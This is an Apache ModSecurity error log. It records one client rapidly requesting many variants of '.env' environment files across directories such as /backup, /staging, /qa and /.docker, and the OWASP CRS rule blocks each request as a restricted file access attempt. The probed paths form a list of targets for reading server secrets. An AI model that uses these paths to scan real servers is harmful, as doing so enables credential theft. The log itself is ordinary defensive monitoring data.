[Sat Mar 21 04:10:26.408557 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "ab4MIhsiL8ED2XitCKA8ZQAAAAI"]
[Sat Mar 21 04:10:26.408712 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "ab4MIhsiL8ED2XitCKA8ZQAAAAI"]
[Sat Mar 21 04:10:26.408850 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "ab4MIhsiL8ED2XitCKA8ZQAAAAI"]
[Sat Mar 21 04:10:26.708859 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "ab4MIhsiL8ED2XitCKA8ZgAAAAI"]
[Sat Mar 21 04:10:26.709030 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "ab4MIhsiL8ED2XitCKA8ZgAAAAI"]
[Sat Mar 21 04:10:26.709656 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "ab4MIhsiL8ED2XitCKA8ZgAAAAI"]
[Sat Mar 21 04:10:29.529077 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env"] [unique_id "ab4MJRsiL8ED2XitCKA8ZwAAAAI"]
[Sat Mar 21 04:10:29.529233 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env"] [unique_id "ab4MJRsiL8ED2XitCKA8ZwAAAAI"]
[Sat Mar 21 04:10:29.529377 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env"] [unique_id "ab4MJRsiL8ED2XitCKA8ZwAAAAI"]
[Sat Mar 21 04:10:29.904078 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.local"] [unique_id "ab4MJRsiL8ED2XitCKA8aAAAAAI"]
[Sat Mar 21 04:10:29.904279 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.local"] [unique_id "ab4MJRsiL8ED2XitCKA8aAAAAAI"]
[Sat Mar 21 04:10:29.904440 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.local"] [unique_id "ab4MJRsiL8ED2XitCKA8aAAAAAI"]
[Sat Mar 21 04:10:30.199158 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.staging"] [unique_id "ab4MJhsiL8ED2XitCKA8aQAAAAI"]
[Sat Mar 21 04:10:30.199318 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.staging"] [unique_id "ab4MJhsiL8ED2XitCKA8aQAAAAI"]
[Sat Mar 21 04:10:30.199487 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.staging"] [unique_id "ab4MJhsiL8ED2XitCKA8aQAAAAI"]
[Sat Mar 21 04:10:30.493464 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "ab4MJhsiL8ED2XitCKA8agAAAAI"]
[Sat Mar 21 04:10:30.493618 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "ab4MJhsiL8ED2XitCKA8agAAAAI"]
[Sat Mar 21 04:10:30.493767 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "ab4MJhsiL8ED2XitCKA8agAAAAI"]
[Sat Mar 21 04:10:30.787858 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.staging"] [unique_id "ab4MJhsiL8ED2XitCKA8awAAAAI"]
[Sat Mar 21 04:10:30.788086 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.staging"] [unique_id "ab4MJhsiL8ED2XitCKA8awAAAAI"]
[Sat Mar 21 04:10:30.788290 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.staging"] [unique_id "ab4MJhsiL8ED2XitCKA8awAAAAI"]
[Sat Mar 21 04:10:31.082393 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.local"] [unique_id "ab4MJxsiL8ED2XitCKA8bAAAAAI"]
[Sat Mar 21 04:10:31.082564 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.local"] [unique_id "ab4MJxsiL8ED2XitCKA8bAAAAAI"]
[Sat Mar 21 04:10:31.082753 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.local"] [unique_id "ab4MJxsiL8ED2XitCKA8bAAAAAI"]
[Sat Mar 21 04:10:31.377268 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stg/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.local"] [unique_id "ab4MJxsiL8ED2XitCKA8bQAAAAI"]
[Sat Mar 21 04:10:31.377445 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.local"] [unique_id "ab4MJxsiL8ED2XitCKA8bQAAAAI"]
[Sat Mar 21 04:10:31.377595 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.local"] [unique_id "ab4MJxsiL8ED2XitCKA8bQAAAAI"]
[Sat Mar 21 04:10:31.671882 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "ab4MJxsiL8ED2XitCKA8bgAAAAI"]
[Sat Mar 21 04:10:31.672045 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "ab4MJxsiL8ED2XitCKA8bgAAAAI"]
[Sat Mar 21 04:10:31.672187 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "ab4MJxsiL8ED2XitCKA8bgAAAAI"]
[Sat Mar 21 04:10:31.966271 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "ab4MJxsiL8ED2XitCKA8bwAAAAI"]
[Sat Mar 21 04:10:31.966462 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "ab4MJxsiL8ED2XitCKA8bwAAAAI"]
[Sat Mar 21 04:10:31.967033 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "ab4MJxsiL8ED2XitCKA8bwAAAAI"]
[Sat Mar 21 04:10:32.261194 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/laravel/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ab4MKBsiL8ED2XitCKA8cAAAAAI"]
[Sat Mar 21 04:10:32.261347 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ab4MKBsiL8ED2XitCKA8cAAAAAI"]
[Sat Mar 21 04:10:32.261487 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ab4MKBsiL8ED2XitCKA8cAAAAAI"]
[Sat Mar 21 04:10:32.555651 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.production"] [unique_id "ab4MKBsiL8ED2XitCKA8cQAAAAI"]
[Sat Mar 21 04:10:32.555817 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.production"] [unique_id "ab4MKBsiL8ED2XitCKA8cQAAAAI"]
[Sat Mar 21 04:10:32.555958 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.production"] [unique_id "ab4MKBsiL8ED2XitCKA8cQAAAAI"]
[Sat Mar 21 04:10:32.850023 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.staging"] [unique_id "ab4MKBsiL8ED2XitCKA8cgAAAAI"]
